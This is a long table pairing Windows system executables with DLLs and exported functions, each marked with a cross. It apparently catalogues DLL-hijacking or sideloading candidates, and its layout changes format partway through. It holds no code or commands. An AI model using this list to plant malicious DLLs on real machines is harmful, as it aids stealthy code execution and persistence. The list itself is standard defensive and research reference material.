| ❌ | bootim.exe | WDSCORE.dll | DllMain |
| ❌ | bootim.exe | WDSCORE.dll | WdsSetupLogMessageW |
| ❌ | calc.exe | CRYPTBASE.DLL | DllMain |
| ❌ | calc.exe | edputil.dll | DllMain |
| ❌ | calc.exe | edputil.dll | EdpGetIsManaged |
| ❌ | calc.exe | MLANG.dll | ConvertINetUnicodeToMultiByte |
| ❌ | calc.exe | MLANG.dll | DllMain |
| ❌ | calc.exe | PROPSYS.dll | DllMain |
| ❌ | calc.exe | PROPSYS.dll | PSCreateMemoryPropertyStore |
| ❌ | calc.exe | PROPSYS.dll | PSPropertyBag_WriteDWORD |
| ❌ | calc.exe | Secur32.dll | DllMain |
| ❌ | calc.exe | SSPICLI.DLL | DllMain |
| ❌ | calc.exe | SSPICLI.DLL | GetUserNameExW |
| ❌ | calc.exe | WININET.dll | DllMain |
| ❌ | calc.exe | WININET.dll | GetUrlCacheEntryBinaryBlob |
| ❌ | certreq.exe | cscapi.dll | CscNetApiGetInterface |
| ❌ | certreq.exe | cscapi.dll | DllMain |
| ❌ | certreq.exe | DUI70.dll | DllMain |
| ❌ | certreq.exe | DUI70.dll | FlushThemeHandles |
| ❌ | certreq.exe | DUI70.dll | InitProcessPriv |
| ❌ | certreq.exe | DUI70.dll | InitThread |
| ❌ | certreq.exe | dwmapi.dll | DllMain |
| ❌ | certreq.exe | dwmapi.dll | DwmSetWindowAttribute |
| ❌ | certreq.exe | LINKINFO.dll | DllMain |
| ❌ | certreq.exe | LINKINFO.dll | IsValidLinkInfo |
| ❌ | certreq.exe | SSPICLI.DLL | DllMain |
| ❌ | certreq.exe | WindowsCodecs.dll | DllMain |
| ❌ | certreq.exe | WindowsCodecs.dll | WICCreateImagingFactory_Proxy |
| ❌ | certreq.exe | WININET.dll | DllMain |
| ❌ | certreq.exe | XmlLite.dll | CreateXmlReader |
| ❌ | certreq.exe | XmlLite.dll | CreateXmlReaderInputWithEncodingName |
| ❌ | certreq.exe | XmlLite.dll | DllMain |
| ❌ | certutil.exe | Cabinet.dll | DllMain |
| ❌ | certutil.exe | CRYPTUI.dll | DllMain |
| ❌ | certutil.exe | DSROLE.DLL | DllMain |
| ❌ | certutil.exe | LOGONCLI.DLL | DllMain |
| ❌ | certutil.exe | NETUTILS.DLL | DllMain |
| ❌ | certutil.exe | NTDSAPI.dll | DllMain |
| ❌ | certutil.exe | SAMCLI.DLL | DllMain |
| ❌ | certutil.exe | SSPICLI.DLL | DllMain |
| ❌ | change.exe | logoncli.dll | DllMain |
| ❌ | change.exe | netutils.dll | DllMain |
| ❌ | change.exe | samcli.dll | DllMain |
| ❌ | change.exe | srvcli.dll | DllMain |
| ❌ | change.exe | utildll.dll | DllMain |
| ❌ | change.exe | WINSTA.dll | DllMain |
| ❌ | charmap.exe | GetUName.dll | DllMain |
| ❌ | charmap.exe | MSFTEDIT.DLL | DllMain |
| ❌ | checknetisolation.exe | DNSAPI.dll | DllMain |
| ❌ | checknetisolation.exe | FirewallAPI.dll | DllMain |
| ❌ | checknetisolation.exe | fwbase.dll | DllMain |
| ❌ | checknetisolation.exe | fwbase.dll | FwAlloc |
| ❌ | checknetisolation.exe | fwbase.dll | FwCriticalSectionCreate |
| ❌ | checknetisolation.exe | fwbase.dll | FwCriticalSectionDestroy |
| ❌ | checknetisolation.exe | fwbase.dll | FwFree |
| ❌ | checknetisolation.exe | fwpuclnt.dll | DllMain |
| ❌ | chglogon.exe | logoncli.dll | DllMain |
| ❌ | chglogon.exe | netutils.dll | DllMain |
| ❌ | chglogon.exe | REGAPI.dll | DllMain |
| ❌ | chglogon.exe | samcli.dll | DllMain |
| ❌ | chglogon.exe | srvcli.dll | DllMain |
| ❌ | chglogon.exe | utildll.dll | DllMain |
| ❌ | chglogon.exe | WINSTA.dll | DllMain |
| ❌ | chgport.exe | logoncli.dll | DllMain |
| ❌ | chgport.exe | netutils.dll | DllMain |
| ❌ | chgport.exe | samcli.dll | DllMain |
| ❌ | chgport.exe | srvcli.dll | DllMain |
| ❌ | chgport.exe | utildll.dll | DllMain |
| ❌ | chgport.exe | WINSTA.dll | DllMain |
| ❌ | chkdsk.exe | DEVOBJ.dll | DllMain |
| ❌ | chkntfs.exe | DEVOBJ.dll | DllMain |
| ❌ | cipher.exe | DSROLE.dll | DllMain |
| ❌ | cipher.exe | EFSUTIL.dll | DllMain |
| ❌ | cipher.exe | FeClient.dll | DllMain |
| ❌ | cipher.exe | iertutil.dll | DllMain |
| ❌ | cipher.exe | NTDSAPI.dll | DllMain |
| ❌ | cipher.exe | VAULTCLI.dll | DllMain |
| ❌ | clipup.exe | CRYPTXML.dll | DllMain |
| ❌ | clipup.exe | webservices.dll | DllMain |
| ❌ | cmdl32.exe | Cabinet.dll | DllMain |
| ❌ | cmdl32.exe | cmpbk32.dll | DllMain |
| ❌ | cmdl32.exe | RASAPI32.dll | DllMain |
| ❌ | cmdl32.exe | rasman.dll | DllMain |
| ❌ | cmdl32.exe | WINHTTP.dll | DllMain |
| ❌ | colorcpl.exe | ColorAdapterClient.dll | DllMain |
| ❌ | colorcpl.exe | colorui.dll | DllMain |
| ❌ | colorcpl.exe | colorui.dll | LaunchColorCpl |
| ❌ | colorcpl.exe | IPHLPAPI.DLL | DllMain |
| ❌ | colorcpl.exe | mscms.dll | ColorCplInitialize |
| ❌ | colorcpl.exe | mscms.dll | ColorCplUninitialize |
| ❌ | colorcpl.exe | mscms.dll | DllMain |
| ❌ | colorcpl.exe | PROPSYS.dll | DllMain |
| ❌ | colorcpl.exe | USERENV.dll | DllMain |
| ❌ | compmgmtlauncher.exe | apphelp.dll | ApphelpCheckShellObject |
| ❌ | compmgmtlauncher.exe | apphelp.dll | DllMain |
| ❌ | compmgmtlauncher.exe | CLDAPI.dll | CfGetPlaceholderStateFromAttributeTag |
| ❌ | compmgmtlauncher.exe | CLDAPI.dll | DllMain |
| ❌ | compmgmtlauncher.exe | CRYPTBASE.dll | DllMain |
| ❌ | compmgmtlauncher.exe | CRYPTBASE.dll | SystemFunction036 |
| ❌ | compmgmtlauncher.exe | edputil.dll | DllMain |
| ❌ | compmgmtlauncher.exe | edputil.dll | EdpGetIsManaged |
| ❌ | compmgmtlauncher.exe | FLTLIB.DLL | DllMain |
| ❌ | compmgmtlauncher.exe | PROPSYS.dll | DllMain |
| ❌ | compmgmtlauncher.exe | PROPSYS.dll | PSCreateMemoryPropertyStore |
| ❌ | compmgmtlauncher.exe | PROPSYS.dll | PSPropertyBag_WriteDWORD |
| ❌ | ctfmon.exe | MsCtfMonitor.DLL | DllMain |
| ❌ | ctfmon.exe | MsCtfMonitor.DLL | DoMsCtfMonitor |
| ❌ | ctfmon.exe | MSUTB.dll | DllMain |
| ❌ | ctfmon.exe | WINSTA.dll | DllMain |
| ❌ | cttune.exe | DWrite.dll | DllMain |
| ❌ | cttune.exe | DWrite.dll | DWriteCreateFactory |
| ❌ | cttune.exe | OLEACC.dll | DllMain |
| ❌ | cttune.exe | UxTheme.dll | DllMain |
| ❌ | dataexchangehost.exe | d2d1.dll | DllMain |
| ❌ | dataexchangehost.exe | d3d11.dll | DllMain |
| ❌ | dataexchangehost.exe | DWrite.dll | DllMain |
| ❌ | dataexchangehost.exe | dxgi.dll | DllMain |
| ❌ | datausagelivetiletask.exe | dusmapi.dll | DllMain |
| ❌ | datausagelivetiletask.exe | IPHLPAPI.DLL | DllMain |
| ❌ | ddodiag.exe | XmlLite.dll | CreateXmlReader |
| ❌ | ddodiag.exe | XmlLite.dll | DllMain |
| ❌ | deploymentcsphelper.exe | dbgcore.DLL | DllMain |
| ❌ | deploymentcsphelper.exe | DismApi.DLL | DllMain |
| ❌ | deploymentcsphelper.exe | WDSCORE.dll | ConstructPartialMsgVW |
| ❌ | deploymentcsphelper.exe | WDSCORE.dll | CurrentIP |
| ❌ | deploymentcsphelper.exe | WDSCORE.dll | DllMain |
| ❌ | deploymentcsphelper.exe | WDSCORE.dll | WdsInitialize |
| ❌ | deploymentcsphelper.exe | WDSCORE.dll | WdsSetupLogMessageW |
| ❌ | deploymentcsphelper.exe | WDSCORE.dll | WdsTerminate |
| ❌ | devicecensus.exe | dcntel.dll | DllMain |
| ❌ | devicecensus.exe | dcntel.dll | GetCensusRegistryLocation |
| ❌ | devicecensus.exe | dcntel.dll | RunSystemContextCensus |
| ❌ | devicecensus.exe | dcntel.dll | SetCustomTrigger |
| ❌ | devicecensus.exe | dcntel.dll | SetCustomTriggerEx |
| ❌ | devicecensus.exe | IPHLPAPI.DLL | DllMain |
| ❌ | devicecensus.exe | IPHLPAPI.DLL | GetAdaptersInfo |
| ❌ | devicecensus.exe | logoncli.dll | DllMain |
| ❌ | devicecensus.exe | logoncli.dll | DsGetDcNameW |
| ❌ | devicecensus.exe | netutils.dll | DllMain |
| ❌ | devicecensus.exe | netutils.dll | NetApiBufferAllocate |
| ❌ | devicecensus.exe | WINHTTP.dll | DllMain |
| ❌ | devicecredentialdeployment.exe | DeviceCredential.dll | DllMain |
| ❌ | deviceenroller.exe | DEVOBJ.dll | DllMain |
| ❌ | deviceenroller.exe | DMCmnUtils.dll | CopyString |
| ❌ | deviceenroller.exe | DMCmnUtils.dll | DllMain |
| ❌ | deviceenroller.exe | dmEnrollEngine.DLL | DllMain |
| ❌ | deviceenroller.exe | dmenterprisediagnostics.dll | DllMain |
| ❌ | deviceenroller.exe | iri.dll | DllMain |
| ❌ | deviceenroller.exe | netutils.dll | DllMain |
| ❌ | deviceenroller.exe | omadmapi.dll | DllMain |
| ❌ | deviceenroller.exe | omadmapi.dll | FreeCommandLineOptions |
| ❌ | deviceenroller.exe | omadmapi.dll | ProcessCommandLine |
| ❌ | deviceenroller.exe | samcli.dll | DllMain |
| ❌ | deviceenroller.exe | USERENV.dll | DllMain |
| ❌ | deviceenroller.exe | XmlLite.dll | DllMain |
| ❌ | devicepairingwizard.exe | dwmapi.dll | DllMain |
| ❌ | devicepairingwizard.exe | dwmapi.dll | DwmExtendFrameIntoClientArea |
| ❌ | devicepairingwizard.exe | OLEACC.dll | DllMain |
| ❌ | devicepairingwizard.exe | OLEACC.dll | GetRoleTextW |
| ❌ | dfrgui.exe | SXSHARED.dll | DllMain |
| ❌ | dfrgui.exe | SXSHARED.dll | SxTracerGetThreadContextRetail |
| ❌ | dialer.exe | rtutils.dll | DllMain |
| ❌ | dialer.exe | rtutils.dll | TraceRegisterExW |
| ❌ | dialer.exe | rtutils.dll | TraceVprintfExA |
| ❌ | dialer.exe | SspiCli.dll | DllMain |
| ❌ | dialer.exe | SspiCli.dll | GetUserNameExW |
| ❌ | dialer.exe | TAPI32.dll | DllMain |
| ❌ | dialer.exe | TAPI32.dll | lineInitializeExW |
| ❌ | disksnapshot.exe | CRYPTBASE.dll | DllMain |
| ❌ | disksnapshot.exe | CRYPTBASE.dll | SystemFunction036 |
| ❌ | dispdiag.exe | DEVOBJ.dll | DevObjCreateDeviceInfoList |
| ❌ | dispdiag.exe | DEVOBJ.dll | DevObjDestroyDeviceInfoList |
| ❌ | dispdiag.exe | DEVOBJ.dll | DevObjGetClassDevs |
| ❌ | dispdiag.exe | DEVOBJ.dll | DllMain |
| ❌ | dispdiag.exe | DXVA2.dll | DllMain |
| ❌ | dispdiag.exe | DXVA2.dll | GetNumberOfPhysicalMonitorsFromHMONITOR |
| ❌ | dispdiag.exe | WMICLNT.dll | DllMain |
| ❌ | dispdiag.exe | WMICLNT.dll | WmiDevInstToInstanceNameW |
| ❌ | dispdiag.exe | WMICLNT.dll | WmiOpenBlock |
| ❌ | displayswitch.exe | dwmapi.dll | DllMain |
| ❌ | displayswitch.exe | policymanager.dll | DllMain |
| ❌ | displayswitch.exe | policymanager.dll | PolicyManager_GetPolicyInt |
| ❌ | displayswitch.exe | UxTheme.dll | DllMain |
| ❌ | displayswitch.exe | WINSTA.dll | DllMain |
| ❌ | djoin.exe | dbgcore.DLL | DllMain |
| ❌ | djoin.exe | JOINUTIL.DLL | DllMain |
| ❌ | djoin.exe | logoncli.dll | DllMain |
| ❌ | djoin.exe | netutils.dll | DllMain |
| ❌ | djoin.exe | netutils.dll | NetApiBufferFree |
| ❌ | djoin.exe | wdscore.dll | ConstructPartialMsgVW |
| ❌ | djoin.exe | wdscore.dll | CurrentIP |
| ❌ | djoin.exe | wdscore.dll | DllMain |
| ❌ | djoin.exe | wdscore.dll | WdsSetupLogDestroy |
| ❌ | djoin.exe | wdscore.dll | WdsSetupLogInit |
| ❌ | djoin.exe | wdscore.dll | WdsSetupLogMessageW |
| ❌ | djoin.exe | wkscli.dll | DllMain |
| ❌ | dmcertinst.exe | certenroll.dll | DllMain |
| ❌ | dmcertinst.exe | DMCmnUtils.dll | DllMain |
| ❌ | dmcertinst.exe | DSPARSE.dll | DllMain |
| ❌ | dmcertinst.exe | iri.dll | DllMain |
| ❌ | dmcertinst.exe | omadmapi.dll | DllMain |
| ❌ | dmcertinst.exe | omadmapi.dll | ProcessCommandLine |
| ❌ | dmcfghost.exe | DMCmnUtils.dll | DllMain |
| ❌ | dmcfghost.exe | DMPushProxy.dll | DllMain |
| ❌ | dmcfghost.exe | DMPushProxy.dll | PushRouter_FreeGetMessageEventName |
| ❌ | dmcfghost.exe | DMPushProxy.dll | PushRouter_Open |
| ❌ | dmcfghost.exe | dmxmlhelputils.dll | DllMain |
| ❌ | dmcfghost.exe | dsclient.dll | DllMain |
| ❌ | dmcfghost.exe | iri.dll | DllMain |
| ❌ | dmcfghost.exe | omadmapi.dll | DllMain |
| ❌ | dmcfghost.exe | XmlLite.dll | DllMain |
| ❌ | dmclient.exe | WINHTTP.dll | DllMain |
| ❌ | dmclient.exe | XmlLite.dll | DllMain |
| ❌ | dmnotificationbroker.exe | DMCmnUtils.dll | DllMain |
| ❌ | dmomacpmo.exe | DEVOBJ.dll | DllMain |
| ❌ | dmomacpmo.exe | DMCmnUtils.dll | DllMain |
| ❌ | dmomacpmo.exe | dmEnrollEngine.DLL | DllMain |
| ❌ | dmomacpmo.exe | DMProcessXMLFiltered.dll | DllMain |
| ❌ | dmomacpmo.exe | dsclient.dll | DllMain |
| ❌ | dmomacpmo.exe | iri.dll | DllMain |
| ❌ | dmomacpmo.exe | omadmapi.dll | DllMain |
| ❌ | dmomacpmo.exe | omadmapi.dll | ProcessCommandLine |
| ❌ | dmomacpmo.exe | USERENV.dll | DllMain |
| ❌ | dmomacpmo.exe | XmlLite.dll | DllMain |
| ❌ | dnscacheugc.exe | dbgcore.DLL | DllMain |
| ❌ | dnscacheugc.exe | IPHLPAPI.DLL | DllMain |
| ❌ | dnscacheugc.exe | wdscore.dll | ConstructPartialMsgVW |
| ❌ | dnscacheugc.exe | wdscore.dll | CurrentIP |
:x:
dnscacheugc.exe
wdscore.dll
DllMain
:x:
dnscacheugc.exe
wdscore.dll
WdsSetupLogDestroy
:x:
dnscacheugc.exe
wdscore.dll
WdsSetupLogInit
:x:
dnscacheugc.exe
wdscore.dll
WdsSetupLogMessageW
:x:
dpapimig.exe
netutils.dll
DllMain
:x:
dpapimig.exe
netutils.dll
NetApiBufferFree
:x:
dpapimig.exe
samcli.dll
DllMain
:x:
dpapimig.exe
samcli.dll
NetUserModalsGet
:x:
dpapimig.exe
SAMLIB.dll
DllMain
:x:
dpapimig.exe
SAMLIB.dll
SamConnect
:x:
dpapimig.exe
SAMLIB.dll
SamEnumerateDomainsInSamServer
:x:
dpapimig.exe
SAMLIB.dll
SamFreeMemory
:x:
dpiscaling.exe
CLDAPI.dll
CfGetPlaceholderStateFromAttributeTag
:x:
dpiscaling.exe
CLDAPI.dll
DllMain
:x:
dpiscaling.exe
CRYPTBASE.DLL
DllMain
:x:
dpiscaling.exe
edputil.dll
DllMain
:x:
dpiscaling.exe
edputil.dll
EdpGetIsManaged
:x:
dpiscaling.exe
FLTLIB.DLL
DllMain
:x:
dpiscaling.exe
PROPSYS.dll
DllMain
:x:
dpiscaling.exe
PROPSYS.dll
PSCreateMemoryPropertyStore
:x:
dpiscaling.exe
PROPSYS.dll
PSPropertyBag_WriteDWORD
:x:
driverquery.exe
netutils.dll
DllMain
:x:
driverquery.exe
srvcli.dll
DllMain
:x:
driverquery.exe
SspiCli.dll
DllMain
:x:
drvinst.exe
DEVOBJ.dll
DllMain
:x:
drvinst.exe
DEVRTL.dll
DllMain
:x:
dsregcmd.exe
dsreg.dll
DllMain
:x:
dsregcmd.exe
logoncli.dll
DllMain
:x:
dsregcmd.exe
netutils.dll
DllMain
:x:
dsregcmd.exe
PROPSYS.dll
DllMain
:x:
dsregcmd.exe
SSPICLI.DLL
DllMain
:x:
dsregcmd.exe
USERENV.dll
DllMain
:x:
dsregcmd.exe
WINHTTP.dll
DllMain
:x:
dsregcmd.exe
WININET.dll
DllMain
:x:
dsregcmd.exe
wkscli.dll
DllMain
:x:
dstokenclean.exe
dsclient.dll
DllMain
:x:
dstokenclean.exe
dsclient.dll
DSRemoveExpiredTokens
:x:
| dwm.exe | CoreMessaging.dll | DllMain | :x: |
| dwm.exe | d2d1.dll | DllMain | :x: |
| dwm.exe | d3d11.dll | DllMain | :x: |
| dwm.exe | D3DCOMPILER_47.dll | DllMain | :x: |
| dwm.exe | dwmcore.dll | DllMain | :x: |
| dwm.exe | dxgi.dll | DllMain | :x: |
| dwm.exe | dxgi.dll | DXGIDeclareAdapterRemovalSupport | :x: |
| dwwin.exe | wer.dll | DllMain | :x: |
| dxgiadaptercache.exe | d3d11.dll | DllMain | :x: |
| dxgiadaptercache.exe | d3d12.dll | DllMain | :x: |
| dxgiadaptercache.exe | dxgi.dll | DllMain | :x: |
| dxpserver.exe | dwmapi.dll | DllMain | :x: |
| dxpserver.exe | msi.dll | DllMain | :x: |
| dxpserver.exe | PROPSYS.dll | DllMain | :x: |
| dxpserver.exe | XmlLite.dll | DllMain | :x: |
| easeofaccessdialog.exe | OLEACC.dll | DllMain | :x: |
| edpcleanup.exe | DMCmnUtils.dll | DllMain | :x: |
| edpcleanup.exe | DNSAPI.dll | DllMain | :x: |
| edpcleanup.exe | FirewallAPI.dll | DllMain | :x: |
| edpcleanup.exe | fwbase.dll | DllMain | :x: |
| edpcleanup.exe | fwbase.dll | FwCriticalSectionCreate | :x: |
| edpcleanup.exe | fwbase.dll | FwCriticalSectionDestroy | :x: |
| edpcleanup.exe | netutils.dll | DllMain | :x: |
| edpcleanup.exe | policymanager.dll | DllMain | :x: |
| edpcleanup.exe | SspiCli.dll | DllMain | :x: |
| edpcleanup.exe | wkscli.dll | DllMain | :x: |
| eduprintprov.exe | deviceassociation.dll | DllMain | :x: |
| eduprintprov.exe | policymanager.dll | DllMain | :x: |
| eduprintprov.exe | policymanager.dll | PolicyManager_GetPolicy | :x: |
| eduprintprov.exe | SspiCli.dll | DllMain | :x: |
| eduprintprov.exe | SspiCli.dll | GetUserNameExW | :x: |
| efsui.exe | credui.dll | DllMain | :x: |
| efsui.exe | CRYPTBASE.DLL | DllMain | :x: |
| efsui.exe | CRYPTUI.dll | DllMain | :x: |
| efsui.exe | DSROLE.dll | DllMain | :x: |
| efsui.exe | EFSADU.dll | DllMain | :x: |
| efsui.exe | EFSUTIL.dll | DllMain | :x: |
| efsui.exe | FeClient.dll | DllMain | :x: |
| efsui.exe | logoncli.dll | DllMain | :x: |
| efsui.exe | netutils.dll | DllMain | :x: |
| efsui.exe | USERENV.dll | DllMain | :x: |
| efsui.exe | VAULTCLI.dll | DllMain | :x: |
| ehstorauthn.exe | UxTheme.dll | DllMain | :x: |
| esentutl.exe | ESENT.dll | DllMain | :x: |
| eventcreate.exe | netutils.dll | DllMain | :x: |
| eventcreate.exe | srvcli.dll | DllMain | :x: |
| eventcreate.exe | SspiCli.dll | DllMain | :x: |
| expand.exe | Cabinet.dll | DllMain | :x: |
| extrac32.exe | Cabinet.dll | DllMain | :x: |
| fhmanagew.exe | fhsvcctl.dll | DllMain | :x: |
| filehistory.exe | CRYPTBASE.dll | DllMain | :x: |
| filehistory.exe | CRYPTBASE.dll | SystemFunction036 | :x: |
| filehistory.exe | UxTheme.dll | DllMain | :x: |
| filehistory.exe | UxTheme.dll | EnableThemeDialogTexture | :x: |
| filehistory.exe | UxTheme.dll | OpenThemeData | :x: |
| fixmapi.exe | mapistub.dll | DllMain | :x: |
| fixmapi.exe | mapistub.dll | FixMAPI | :x: |
| fltmc.exe | FLTLIB.DLL | DllMain | :x: |
| fltmc.exe | FLTLIB.DLL | FilterFindFirst | :x: |
| fltmc.exe | FLTLIB.DLL | FilterFindNext | :x: |
| fondue.exe | msi.dll | DllMain | :x: |
| fondue.exe | osbaseln.dll | DllMain | :x: |
| fondue.exe | PROPSYS.dll | DllMain | :x: |
| fsiso.exe | iumbase.DLL | DllMain | :x: |
| fsquirt.exe | DEVOBJ.dll | DevObjCreateDeviceInfoList | :x: |
| fsquirt.exe | DEVOBJ.dll | DevObjDestroyDeviceInfoList | :x: |
| fsquirt.exe | DEVOBJ.dll | DevObjGetClassDevs | :x: |
| fsquirt.exe | DEVOBJ.dll | DllMain | :x: |
| fsquirt.exe | dwmapi.dll | DllMain | :x: |
| fsquirt.exe | dwmapi.dll | DwmExtendFrameIntoClientArea | :x: |
| fsquirt.exe | OLEACC.dll | DllMain | :x: |
| fsquirt.exe | OLEACC.dll | GetRoleTextW | :x: |
| ftp.exe | SspiCli.dll | DllMain | :x: |
| fvenotify.exe | FVEAPI.dll | DllMain | :x: |
| fvenotify.exe | FVEAPI.dll | FveFindFirstVolume | :x: |
| fvenotify.exe | FVEAPI.dll | FveFindNextVolume | :x: |
| fvenotify.exe | FVEAPI.dll | FveGetStatus | :x: |
| fvenotify.exe | FVEAPI.dll | FveGetVolumeNameW | :x: |
| fvenotify.exe | FVEAPI.dll | FveIsVolumeEncryptable | :x: |
| fvenotify.exe | FVEAPI.dll | FveOpenVolumeByHandle | :x: |
| fvenotify.exe | FVEAPI.dll | FveOpenVolumeW | :x: |
| fveprompt.exe | FVEAPI.dll | DllMain | :x: |
| fxscover.exe | IPHLPAPI.DLL | DllMain | :x: |
| fxscover.exe | IPHLPAPI.DLL | GetAdaptersAddresses | :x: |
| fxssvc.exe | credui.dll | DllMain | :x: |
| fxssvc.exe | FXSTIFF.dll | DllMain | :x: |
| fxssvc.exe | IPHLPAPI.DLL | DllMain | :x: |
| fxssvc.exe | PROPSYS.dll | DllMain | :x: |
| fxssvc.exe | TAPI32.dll | DllMain | :x: |
| gamepanel.exe | d2d1.dll | DllMain | :x: |
| gamepanel.exe | d3d11.dll | DllMain | :x: |
| gamepanel.exe | dcomp.dll | DllMain | :x: |
| gamepanel.exe | dwmapi.dll | DllMain | :x: |
| gamepanel.exe | dwmapi.dll | DwmSetWindowAttribute | :x: |
| gamepanel.exe | DWrite.dll | DllMain | :x: |
| gamepanel.exe | DWrite.dll | DWriteCreateFactory | :x: |
| gamepanel.exe | dxgi.dll | CreateDXGIFactory2 | :x: |
| gamepanel.exe | dxgi.dll | DllMain | :x: |
| gamepanel.exe | msdrm.dll | DllMain | :x: |
| gamepanel.exe | UIAutomationCore.DLL | DllMain | :x: |
| gamepanel.exe | UxTheme.dll | DllMain | :x: |
| gamepanel.exe | UxTheme.dll | EnableThemeDialogTexture | :x: |
| gamepanel.exe | UxTheme.dll | OpenThemeData | :x: |
| genvalobj.exe | bcd.dll | DllMain | :x: |
| getmac.exe | netutils.dll | DllMain | :x: |
| getmac.exe | srvcli.dll | DllMain | :x: |
| getmac.exe | SspiCli.dll | DllMain | :x: |
| getmac.exe | wkscli.dll | DllMain | :x: |
| gpresult.exe | logoncli.dll | DllMain | :x: |
| gpresult.exe | netutils.dll | DllMain | :x: |
| gpresult.exe | NTDSAPI.dll | DllMain | :x: |
| gpresult.exe | Secur32.dll | DllMain | :x: |
| gpresult.exe | srvcli.dll | DllMain | :x: |
| gpresult.exe | SspiCli.dll | DllMain | :x: |
| gpupdate.exe | USERENV.dll | DllMain | :x: |
| gpupdate.exe | wevtapi.dll | DllMain | :x: |
| hvax64.exe | KDSTUB.dll | DllMain | :x: |
| hvix64.exe | KDSTUB.dll | DllMain | :x: |
| hvsievaluator.exe | DismApi.DLL | DllMain | :x: |
| hvsievaluator.exe | DMCmnUtils.dll | DllMain | :x: |
| hvsievaluator.exe | iri.dll | DllMain | :x: |
| hvsievaluator.exe | omadmapi.dll | DllMain | :x: |
| hvsievaluator.exe | policymanager.dll | DllMain | :x: |
| hvsievaluator.exe | policymanager.dll | PolicyManager_GetPolicyInt | :x: |
| ie4uinit.exe | CRYPTBASE.DLL | DllMain | :x: |
| ie4uinit.exe | IEADVPACK.dll | DllMain | :x: |
| ie4uinit.exe | iedkcs32.dll | DllMain | :x: |
| ie4uinit.exe | MLANG.dll | DllMain | :x: |
| ie4uinit.exe | netutils.dll | DllMain | :x: |
| ie4uinit.exe | WININET.dll | DllMain | :x: |
| ie4uinit.exe | wkscli.dll | DllMain | :x: |
| ieunatt.exe | dbgcore.DLL | DllMain | :x: |
| klist.exe | secur32.dll | DllMain | :x: |
| ksetup.exe | logoncli.dll | DllMain | :x: |
| ksetup.exe | netutils.dll | DllMain | :x: |
| ksetup.exe | srvcli.dll | DllMain | :x: |
| ksetup.exe | SspiCli.dll | DllMain | :x: |
| label.exe | DEVOBJ.dll | DllMain | :x: |
| licensingdiag.exe | Cabinet.dll | DllMain | :x: |
| licensingdiag.exe | Cabinet.dll | FCICreate | :x: |
| licensingdiag.exe | CLIPC.dll | ClipGatherDiagnostics | :x: |
| licensingdiag.exe | CLIPC.dll | ClipGenerateDeviceLicenseRequest | :x: |
| licensingdiag.exe | CLIPC.dll | ClipGetLicenseAndPolicyForPfn | :x: |
| licensingdiag.exe | CLIPC.dll | ClipOpen | :x: |
| licensingdiag.exe | CLIPC.dll | DllMain | :x: |
| lockscreencontentserver.exe | dwmapi.dll | DllMain | :x: |
| lpksetup.exe | CRYPTBASE.dll | DllMain | :x: |
| lpksetup.exe | CRYPTBASE.dll | SystemFunction036 | :x: |
| lpksetup.exe | dpx.dll | DllMain | :x: |
| lpremove.exe | AppXAllUserStore.dll | DllMain | :x: |
| lpremove.exe | AppXAllUserStore.dll | IsNonInboxAllUserPackage | :x: |
| lpremove.exe | AppXDeploymentClient.dll | DllMain | :x: |
| lpremove.exe | Bcp47Langs.dll | Bcp47GetMuiForm | :x: |
| lpremove.exe | Bcp47Langs.dll | DllMain | :x: |
| lpremove.exe | Bcp47Langs.dll | GetUserLanguagesForUser | :x: |
| lpremove.exe | DNSAPI.dll | DllMain | :x: |
| lpremove.exe | FirewallAPI.dll | DllMain | :x: |
| lpremove.exe | fwbase.dll | DllMain | :x: |
| lpremove.exe | fwbase.dll | FwCriticalSectionCreate | :x: |
| lpremove.exe | fwbase.dll | FwCriticalSectionDestroy | :x: |
| lpremove.exe | StateRepository.Core.dll | DllMain | :x: |
| magnify.exe | d3d9.dll | DllMain | :x: |
| magnify.exe | MAGNIFICATION.dll | DllMain | :x: |
| magnify.exe | MAGNIFICATION.dll | MagInitialize | :x: |
| magnify.exe | MAGNIFICATION.dll | MagSetFullscreenTransform | :x: |
| magnify.exe | MAGNIFICATION.dll | MagSetFullscreenUseBitmapSmoothing | :x: |
| magnify.exe | MAGNIFICATION.dll | MagSetInputTransform | :x: |
| magnify.exe | MAGNIFICATION.dll | MagShowSystemCursor | :x: |
| magnify.exe | MAGNIFICATION.dll | MagUninitialize | :x: |
| magnify.exe | OLEACC.dll | DllMain | :x: |
| magnify.exe | UIAutomationCore.DLL | DllMain | :x: |
| magnify.exe | WTSAPI32.dll | DllMain | :x: |
| makecab.exe | Cabinet.dll | DllMain | :x: |
| mcbuilder.exe | bcp47mrm.dll | DllMain | :x: |
| mcbuilder.exe | bcp47mrm.dll | IsWellFormedTag | :x: |
| mcbuilder.exe | mrmcoreR.dll | DllMain | :x: |
| mcbuilder.exe | mrmcoreR.dll | MergeSystemPriFiles | :x: |
| mdeserver.exe | d3d11.dll | DllMain | :x: |
| mdeserver.exe | dxgi.dll | DllMain | :x: |
| mdeserver.exe | MFPlat.DLL | DllMain | :x: |
| mdeserver.exe | MFPlat.DLL | MFStartup | :x: |
| mdeserver.exe | RTWorkQ.DLL | DllMain | :x: |
| mdeserver.exe | RTWorkQ.DLL | RtwqRegisterPlatformEvents | :x: |
| mdeserver.exe | RTWorkQ.DLL | RtwqStartup | :x: |
| mdeserver.exe | SspiCli.dll | DllMain | :x: |
| mdeserver.exe | winmde.dll | DllMain | :x: |
| mdmappinstaller.exe | DEVOBJ.dll | DllMain | :x: |
| mdmappinstaller.exe | DMCmnUtils.dll | DllMain | :x: |
| mdmappinstaller.exe | dmEnrollEngine.DLL | DllMain | :x: |
| mdmappinstaller.exe | iri.dll | DllMain | :x: |
| mdmappinstaller.exe | msi.dll | DllMain | :x: |
| mdmappinstaller.exe | omadmapi.dll | DllMain | :x: |
| mdmappinstaller.exe | USERENV.dll | DllMain | :x: |
| mdmappinstaller.exe | WTSAPI32.dll | DllMain | :x: |
| mdmdiagnosticstool.exe | DEVOBJ.dll | DllMain | :x: |
| mdmdiagnosticstool.exe | DMCmnUtils.dll | DllMain | :x: |
| mdmdiagnosticstool.exe | dmEnrollEngine.DLL | DllMain | :x: |
| mdmdiagnosticstool.exe | dmiso8601utils.dll | DllMain | :x: |
| mdmdiagnosticstool.exe | DynamoAPI.dll | DllMain | :x: |
| mdmdiagnosticstool.exe | iri.dll | DllMain | :x: |
| mdmdiagnosticstool.exe | MdmDiagnostics.dll | DllMain | :x: |
| mdmdiagnosticstool.exe | omadmapi.dll | DllMain | :x: |
| mdmdiagnosticstool.exe | policymanager.dll | DllMain | :x: |
| mdmdiagnosticstool.exe | tbs.dll | DllMain | :x: |
| mdmdiagnosticstool.exe | USERENV.dll | DllMain | :x: |
